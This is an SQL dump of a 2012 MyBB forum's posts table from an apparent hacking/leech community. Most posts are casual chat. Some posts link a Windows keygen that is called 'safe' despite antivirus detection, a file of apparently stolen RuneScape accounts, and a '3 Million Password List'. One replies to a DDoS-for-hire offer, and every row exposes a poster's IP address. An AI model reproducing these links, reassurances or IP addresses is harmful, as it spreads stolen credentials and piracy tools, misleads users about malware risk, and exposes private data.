'c48bb4970fc2e27f43bebedb50d88529', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2310', '462', '2300', '35', 'RE: Vote for LHs new logo', '0', '1', 't3h jok3r', '1347984493', '[quote=\'R?????zo?\' pid=\'2300\' dateline=\'1347954201\'] glad you liked my logo :) [/quote] Thanks for making LH a new logo. [quote] I can make better ones I may make one when I have some free time. For now I voted 1. [/quote] Are you sure? ;)', '72.231.24.165', '1223104677', '1', '0', '1', '1347984554', '1', '4c11ee1f68205d2d2bc025ee9e6fe270', '0', '1347984554'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2311', '409', '1889', '30', 'RE: [Full] Forum Poster 3.30', '0', '1', 't3h jok3r', '1347984756', 'This bot supports the outdated versions of MyBB and Vbulletin.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8cdfcada187c038ca769d8cc08a13998', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2312', '441', '2305', '61', 'RE: Adf.ly Bot + Adfoc.us Bot', '0', '1', 't3h jok3r', '1347985874', '[quote=\'iTzIpod\' pid=\'2305\' dateline=\'1347968599\'] Why in the world did you do that??? :/ [/quote] I thought it was infected and instead of having the thread permanently junked I removed the link for further discussions.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7ddabe4a126597bc1af8a527d2128c5d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2313', '409', '2311', '30', 'RE: [Full] Forum Poster 3.30', '0', '82', 'iTzIpod', '1347996942', '[quote=\'t3h jok3r\' pid=\'2311\' dateline=\'1347984756\'] This bot supports the outdated versions of MyBB and Vbulletin. [/quote] You tried it? Yeah. Sorry about that.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd2ff51a198202b8595c8354b1c5315f2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2315', '474', '2287', '25', 'RE: What antivirus you have?', '0', '67', 'HoverCatz', '1348004061', 'Microsoft Security Essentials (The best free)', '178.74.56.137', '-1303758711', '1', '0', '67', '1348004072', '1', '84caadff1b99bf56bd6c86c13b65d91a', '0', '1348004072'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2316', '409', '2313', '30', 'RE: [Full] Forum Poster 3.30', '0', '1', 't3h jok3r', '1348011311', '[quote=\'iTzIpod\' pid=\'2313\' dateline=\'1347996942\'] [quote=\'t3h jok3r\' pid=\'2311\' dateline=\'1347984756\'] This bot supports the outdated versions of MyBB and Vbulletin. [/quote] You tried it? Yeah. Sorry about that. [/quote] No but the versions you have listed are of outdated versions.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'fcd20448b901f14a8cbee3843d6d941c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2317', '472', '2221', '7', 'RE: School story', '0', '1', 't3h jok3r', '1348011484', 'Lmao I bet that your teacher will check this site out some day.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a278cbc27f40f20be81d093e5621fd4c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2318', '475', '0', '7', '500 posts', '0', '1', 't3h jok3r', '1348011635', 'I finally got 500 posts. Its a huge milestone for me.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '70c117325bab210eeefd26ae48d48ce6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2319', '409', '2316', '30', 'RE: [Full] Forum Poster 3.30', '0', '82', 'iTzIpod', '1348011785', '[quote=\'t3h jok3r\' pid=\'2316\' dateline=\'1348011311\'] [quote=\'iTzIpod\' pid=\'2313\' dateline=\'1347996942\'] [quote=\'t3h jok3r\' pid=\'2311\' dateline=\'1347984756\'] This bot supports the outdated versions of MyBB and Vbulletin. [/quote] You tried it? Yeah. Sorry about that. [/quote] No but the versions you have listed are of outdated versions. [/quote] I don\'t got the latest version right now..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bf3cb8b2cfbb897b1692c8e651f54085', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2320', '472', '2317', '7', 'RE: School story', '0', '82', 'iTzIpod', '1348011827', '[quote=\'t3h jok3r\' pid=\'2317\' dateline=\'1348011484\'] Lmao I bet that your teacher will check this site out some day. [/quote] Random Story: One typical day, a new member has registered under NXK\'s Referral Link. It was a member named \"Teacher\" The teacher notices that NXK lied to him/her and then calls the police the next day.. NXK = In Jail. Jokes.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '047796f75fafb6c73125d9107ad76ec3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2321', '475', '2318', '7', 'RE: 500 posts', '0', '82', 'iTzIpod', '1348011918', 'Congratulations on 500 posts my friend. All posts were HQ. <3 Time to go for 1000. ;)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2cf24f8d0b5c1afca33aa68df9b6aef1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2322', '476', '0', '19', '[Junk][Junk][Announcement] t3h jok3r might be inactive', '0', '82', 'iTzIpod', '1348015750', 'I received a PM from t3h jok3r. Our Staff/Mods have received this PM too. The PM said: [quote=\'t3h jok3r\'] [b]Recently my PC broke down so I wont be able to log on long because I will log on my sisters PC. I\'m not sure by when I will get my new laptop but I\'m sure it will be around a week.[/b] Please try to keep LH active and please search for spam and take immediate action. [/quote] If you look at the bolded text, t3h jok3r clearly stated that he might be inactive for a week. And this is because his PC recently broke down. So he will get a new laptop somewhere around next week. Our Staff and Mods will be moderating the forum until then. - iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9ab766e235a3deb8ebbcfb9697033ef3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2323', '476', '2322', '19', '[Junk][Announcement] t3h jok3r might be inactive', '0', '1', 't3h jok3r', '1348018008', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2324', '476', '2322', '19', '[Junk][Junk][Announcement] t3h jok3r might be inactive', '0', '1', 't3h jok3r', '1348018009', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2325', '477', '0', '19', '[Junk]Jok3r is going..', '0', '1', 't3h jok3r', '1348018219', 'I\'m going on a school trip somewhere tomorrow and I won\'t be on much, I would be on hardly a hour. I will come back around Monday, hopefully when I come back everything\'s in one peace :D Please stay active and LH staff (Including mods) will be taking care of LH. There is no one in-charge.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'fc7c878a6249126df8c33fdb29c471e6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2333', '472', '2221', '7', 'RE: School story', '0', '2', 'Apathy', '1348025044', 'Not bad young padiwan. But after she checks your caught. :3', '173.206.137.64', '-1378973376', '0', '0', '0', '0', '1', 'a88fbaafc5838ffbd7583f76b2bbd083', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2327', '171', '2303', '8', 'RE: What Genre do you listen to?', '0', '82', 'iTzIpod', '1348020185', '[quote=\'R?????zo?\' pid=\'2303\' dateline=\'1347957841\'] rock, pop,dubstep, house, some trance and techno I used to listen rap before though. [/quote] I love Techno & Dubstep. <3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2cf35f2a07db4e787d5588229fe37ff1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2328', '478', '0', '7', 'The Hunger Games', '0', '82', 'iTzIpod', '1348020369', 'I just bought the Trilogy (The Hunger Games, The Hunger Games Catching Fire, & The Hunger Games MockingJay) This is my first time reading the book. Never saw the movie before. A lot of people rated it 10/10. I\'m only on page 7 :( Anyways. I\'m reading THG. And I like it so far. Intro is kinda funny when Gale calls Katniss, Catnip. <3 Made me LOL. Have you ever read THG? If so, how was it?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ad82b39352101743c6f1cb9301e24811', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2329', '479', '0', '49', '[Suggestion] Forum Logo resized', '0', '82', 'iTzIpod', '1348022509', 'In my opinion, I think that the current forum logo (Reloadzor\'s) is kind of too big. And so I was thinking, maybe you guys should probably resize it down.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bb3425653a7a758171780ac8e825ced4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2330', '479', '2329', '49', 'RE: [Suggestion] Forum Logo resized', '0', '1', 't3h jok3r', '1348023685', 'I agree with you but I plan on centering the logo. I\'m trying to check it out how it looks after it gets centered.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5188bac57ddf173a25789d3a271caf8e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2331', '475', '2318', '7', 'RE: 500 posts', '0', '1', 't3h jok3r', '1348023834', 'Thanks and yeah that\'s my next milestone.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c921827b7d2ca8a792585678ea729959', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2332', '472', '2320', '7', 'RE: School story', '0', '1', 't3h jok3r', '1348023872', '[quote=\'iTzIpod\' pid=\'2320\' dateline=\'1348011827\'] [quote=\'t3h jok3r\' pid=\'2317\' dateline=\'1348011484\'] Lmao I bet that your teacher will check this site out some day. [/quote] Random Story: One typical day, a new member has registered under NXK\'s Referral Link. It was a member named \"Teacher\" The teacher notices that NXK lied to him/her and then calls the police the next day.. NXK = In Jail. Jokes. [/quote] LOL but he can\'t go to jail over this.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b09f1842351bf41fd0d02bf7a4c3f428', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2334', '480', '0', '15', 'Windows 7 anytime upgrader keygen', '0', '2', 'Apathy', '1348025423', '[img]http://img525.imageshack.us/img525/5010/capturepvb.jpg[/img] “No disks, no delays – and no leaving the house. With Windows Anytime Upgrade, you can upgrade to a more advanced edition of Windows 7 – say from Home Premium to Ultimate – in as little as 10 minutes. That way, you get to take advantage of extra features while keeping your current programs, files, and settings intact. In the past, upgrading Windows could be a bit of a hassle. In Windows 7, the software you need comes pre-installed or you can buy an upgrade key online or from an authorized retail store. Now it’s in your hands to upgrade it yourself! LINK RE-UPLOADED AGAIN. THANK YOU. For upgrading for example Windows 7 Home Premium you have to go to: Start–> in search bar enter anytime —>start anytime prog —> start cdkey generator—>generate cdkey —> enter CD-Key —> SUCCESS! http://www.rarefile.net/m5rv1tcxk78v/Win7.Anytime.rar.html . its going to be detected as a virus because its a keygen but its safe. enjoy:)!! Not tested by me use at your own risk. Reports are it works though.', '173.206.137.64', '-1378973376', '0', '0', '0', '0', '1', '7e7957567b806e8fbe4b833a838f330c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2335', '479', '2329', '49', 'RE: [Suggestion] Forum Logo resized', '0', '62', 'R?????zo?', '1348037938', 'I can resize it since I got the original PSD. Just need to know how you want it :P', '72.13.81.226', '1208832482', '1', '0', '62', '1348037997', '1', '5291236987577df66435274fec9bf2fa', '0', '1348037997'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2336', '474', '2287', '25', 'RE: What antivirus you have?', '0', '62', 'R?????zo?', '1348038146', 'ESET NOD32 :) I think it\'s the best one out there at the moment.', '72.13.81.226', '1208832482', '1', '0', '0', '0', '1', '354a733b4ec6ff4c1a35f48440227883', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2337', '474', '2287', '25', 'RE: What antivirus you have?', '0', '84', 'Thunder™', '1348043558', 'I use Kaspersky at the moment i am looking for eset nod32 keys', '111.91.75.227', '1868254179', '0', '0', '0', '0', '1', 'b4da7a9918ecb84ef2e315082e620181', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2338', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '82', 'iTzIpod', '1348055299', 'Hey Reloadzor, I was thinking, Unique\'s Userbar looks too plain. Can you add some effects to it? Anything that can make it look better. You can make it animated or not. I just want it to look perfect. Icon: Any Font: Any Text: Unique Type: Userbar Size: Current dimensions. Please take your time because I want something that is awesome than something that was rushed.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a0ba717a341fb78122845788b9785ec6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2339', '398', '1860', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$4/Hour]', '0', '53', 'sirchamp', '1348068182', 'Proof please (Picture/Video).', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'e6fa164528c27c1ff72fcdc480b19612', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2340', '431', '2338', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '62', 'R?????zo?', '1348081191', '[quote=\'iTzIpod\' pid=\'2338\' dateline=\'1348055299\'] Hey Reloadzor, I was thinking, Unique\'s Userbar looks too plain. Can you add some effects to it? Anything that can make it look better. You can make it animated or not. I just want it to look perfect. Icon: Any Font: Any Text: Unique Type: Userbar Size: Current dimensions. Please take your time because I want something that is awesome than something that was rushed. [/quote] I will be happy to make this, I\'ve got few ideas but what I\'m not really sure is what the icon could be? do you want the same one or can you or someone give me some suggestion. To be honest that alien one is not kinda \"unique\" so we should get something else, thats my opinion but your the boss :D', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '5bb548d1f8df628983468795ff151ca7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2341', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '82', 'iTzIpod', '1348082698', 'About the icon.. I don\'t know which icon is \"Unique\" Like I picked the Alien one in the first place because it\'s Unique. Like it was different from all humans.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9ac9b7d5c163cd26224631edfde0d2e5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2342', '481', '0', '74', 'Runescape Accounts', '0', '82', 'iTzIpod', '1348085646', 'http://www.mediafire.com/?gxl8ldxsp7adbh8 :ohya: Some have 150k ish and 25k limit. Most of them work, not sure about some of them though.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bc153270a81f751782e1e709b6fe6836', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2343', '482', '0', '61', '3 Million Password List', '0', '82', 'iTzIpod', '1348085780', 'Download: [url=http://adf.ly/DJeON]Click[/url] The file is 228MB Enjoy!', '24.212.197.164', '416597412', '1', '0', '82', '1349024219', '1', '80fc926ceed14a31698dc5cc693efcb9', '0', '1349024219'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2344', '483', '0', '61', '[eBook] How to succeed in Adf.ly/Adfoc.us', '0', '82', 'iTzIpod', '1348086159', '[align=center]To download: https://dl.dropbox.com/u/17717808/SucceedinAdFLY.pdf[/align] [align=center]Enjoy![/align]', '24.212.197.164', '416597412', '1', '0', '82', '1348089620', '1', '35c32fabcebaf0c718c0b366131a17e4', '0', '1348089620'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2345', '484', '0', '4', 'Slender Man here.', '0', '194', 'Slender Man', '1348093029', 'Hello, I\'m Slender Man. I saw your site on MybbTopSites and decided to join.', '99.108.180.49', '1668068401', '1', '0', '0', '0', '1', '893bd31c18b9bace354045367113c6b5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2346', '478', '2328', '7', 'RE: The Hunger Games', '0', '194', 'Slender Man', '1348093165', 'I read the book and seen the movie. I liked it. I have also read Catching Fire. Both are great books.', '99.108.180.49', '1668068401', '1', '0', '0', '0', '1', '8aa6a8817852cc41d90d165abfd639de', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2347', '472', '2221', '7', 'RE: School story', '0', '194', 'Slender Man', '1348093263', 'Nice one, Some teachers are really dumb... lol', '99.108.180.49', '1668068401', '1', '0', '0', '0', '1', '6f7e7982540641db7c6741fbb8d73a15', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2348', '478', '2328', '7', 'RE: The Hunger Games', '0', '2', 'Apathy', '1348095841', 'Yea not to sounds like a hipster but I read it a few years before the movie came out. aka before it became big.', '173.206.137.64', '-1378973376', '0', '0', '0', '0', '1', '5feed9209be4b5e56d83f28cb04ed77d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2349', '484', '2345', '4', 'RE: Slender Man here.', '0', '82', 'iTzIpod', '1348097292', 'Sup Slender Man. Nice name. Nice avatar. I bet we\'re gonna be great friends! :D Enjoy your stay. If you have any questions or concerns, please PM Me, JakeUS, NXK, Apathy, or t3h jok3r. =] Feel free to add me on Skype. Skype ID: iTzIpod - iTzIpod', '24.212.197.164', '416597412', '1', '0', '82', '1348097488', '1', 'bf5a6d22b35b0511587a54838d6bc04a', '0', '1348097488'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2350', '484', '2345', '4', 'RE: Slender Man here.', '0', '2', 'Apathy', '1348097448', 'Welcome to the forums man. Stay active and enjoy.', '173.206.137.64', '-1378973376', '0', '0', '0', '0', '1', '26f65110b07fc4e2aff057497d6dd46b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2351', '478', '2328', '7', 'RE: The Hunger Games', '0', '82', 'iTzIpod', '1348097453', 'LOL Apathy. :p I wish I was you. And then I can brag about how everyone is jealous that I was one of the first people to read THG. @Slender Man, did you read THG MockingJay?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c40349f0aac1079ac6ddea50a4e1933d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2352', '485', '0', '19', '[Junk][?] Switching Userbars?', '0', '82', 'iTzIpod', '1348104186', 'Hey Unique. I was thinking about our current Userbar for Unique. Is it good? Is it bad? Is it too plain? Etc. And so I have been thinking about switching them with something else. I really don\'t know what the Icon should be. But I really dig sexy userbars :3 Animated ones are sexy too. If you\'d like, you can try out for this. If you make something good, and I like it, you will be rewarded.. Reward is ?? Best of Luck. And thanks. - iTzIpod', '24.212.197.164', '416597412', '1', '0', '82', '1348106361', '1', 'cd60822f9c75bab522de2e43f74c71be', '0', '1348106361'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2353', '486', '0', '56', 'Guess how many?', '0', '82', 'iTzIpod', '1348105597', '[align=center][IMG]https://sphotos-b.xx.fbcdn.net/hphotos-snc6/183770_462978410402277_2058134205_n.jpg[/IMG][/align] [align=center]How many squares are in the pic above? [Spoiler=] Answers Answer - 40 [img]http://www.allproudamericans.com/how-many-boxes-can-you-count-in-this-picture-answer.gif[/img] [/spoiler][/align]', '24.212.197.164', '416597412', '1', '0', '82', '1348105753', '1', '6361945d53840b8f8f7a5b7ea5ec4f76', '0', '1348105753'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2354', '487', '0', '56', 'Corrupt a wish', '0', '82', 'iTzIpod', '1348105845', 'The forum game is called \"Corrupt a Wish\" and is played by each poster responding to the previous posters wish in a creative way that somehow crushes the wish, makes it greatly less effective, or brings about other bad consequences for having the wish granted. After granting the wish and telling of the details each poster should then post their wish for the next person. The wishes don\'t have to be anything seriously desirable and can really be anything. Be creative in your response. For example: Wish - \"I wish I had a million dollars Response - \"Granted but too bad that high inflation hits and that million dollars can only afford you a hamburger\" To get things started: I wish I was famous.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '037365e28a2d590e46691b350912f075', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2355', '488', '0', '8', 'What are you listening to?', '0', '82', 'iTzIpod', '1348106004', 'Just post whatever you are listening to. You could find some great artists this way. ;) I\'m listening to PSY - Gangnam Style :3 How about you?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e5723059ba61cdeb05987c7849c9ac88', '0', 